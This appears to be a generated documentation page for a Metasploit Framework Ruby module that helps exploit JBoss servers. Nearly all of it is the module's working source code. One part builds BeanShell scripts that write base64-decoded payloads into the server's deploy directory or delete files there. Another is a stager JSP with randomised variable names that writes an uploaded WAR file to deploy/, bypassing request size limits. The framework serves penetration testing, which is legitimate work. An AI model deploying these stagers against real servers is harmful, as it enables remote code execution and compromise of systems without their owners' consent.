Module: Msf::Exploit::Remote::HTTP::JBoss::BeanShellScripts
- Included in:
- Msf::Exploit::Remote::HTTP::JBoss
- Defined in:
- lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb
Instance Method Summary collapse
-
#create_file_bsh(opts = {}) ⇒ String
Generate a Bean Shell script which creates files inside the JBOSS’s deploy directory.
-
#delete_files_bsh(opts = {}) ⇒ String
Generate a Bean Shell script to delete files from the JBoss’s /deploy directory.
-
#generate_bsh(type, opts = {}) ⇒ String
Generates a Bean Shell Script.
-
#stager_jsp(app_base) ⇒ String
Generate a stager JSP to write a WAR file to the deploy/ directory.
Instance Method Details
#create_file_bsh(opts = {}) ⇒ String
Generate a Bean Shell script which creates files inside the JBOSS’s deploy
directory.
67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 |
# File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 67 def create_file_bsh(opts = {}) dir = opts[:dir] file = opts[:file] contents = opts[:contents] payload_bsh_script = <<-EOT import java.io.FileOutputStream; import sun.misc.BASE64Decoder; String val = "#{contents}"; BASE64Decoder decoder = new BASE64Decoder(); String jboss_home = System.getProperty("jboss.server.home.dir"); new File(jboss_home + "/deploy/#{dir}").mkdir(); byte[] byteval = decoder.decodeBuffer(val); String location = jboss_home + "/deploy/#{file}"; FileOutputStream fstream = new FileOutputStream(location); fstream.write(byteval); fstream.close(); EOT payload_bsh_script end |
#delete_files_bsh(opts = {}) ⇒ String
Generate a Bean Shell script to delete files from the JBoss’s /deploy
directory.
97 98 99 100 101 102 103 104 |
# File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 97 def delete_files_bsh(opts = {}) script = "String jboss_home = System.getProperty(\"jboss.server.home.dir\");\n" opts.values.each do |v| script << "new File(jboss_home + \"/deploy/#{v}\").delete();\n" end script end |
#generate_bsh(type, opts = {}) ⇒ String
Generates a Bean Shell Script.
10 11 12 13 14 15 16 17 18 19 20 |
# File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 10 def generate_bsh(type, opts ={}) bean_shell = nil case type when :create bean_shell = create_file_bsh(opts) when :delete bean_shell = delete_files_bsh(opts) end bean_shell end |
#stager_jsp(app_base) ⇒ String
Generate a stager JSP to write a WAR file to the deploy/ directory. This is used to bypass the size limit for GET/HEAD requests.
27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
# File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 27 def stager_jsp(app_base) decoded_var = Rex::Text.rand_text_alpha(8+rand(8)) file_path_var = Rex::Text.rand_text_alpha(8+rand(8)) jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8)) fos_var = Rex::Text.rand_text_alpha(8+rand(8)) content_var = Rex::Text.rand_text_alpha(8+rand(8)) stager_jsp = <<-EOT <%@page import="java.io.*, java.util.*, sun.misc.BASE64Decoder" %> <% String #{jboss_home_var} = System.getProperty("jboss.server.home.dir"); String #{file_path_var} = #{jboss_home_var} + "/deploy/" + "#{app_base}.war"; try { String #{content_var} = ""; String parameterName = (String)(request.getParameterNames().nextElement()); #{content_var} = request.getParameter(parameterName); FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var}); byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var}); #{fos_var}.write(#{decoded_var}); #{fos_var}.close(); } catch(Exception e){ } %> EOT stager_jsp end |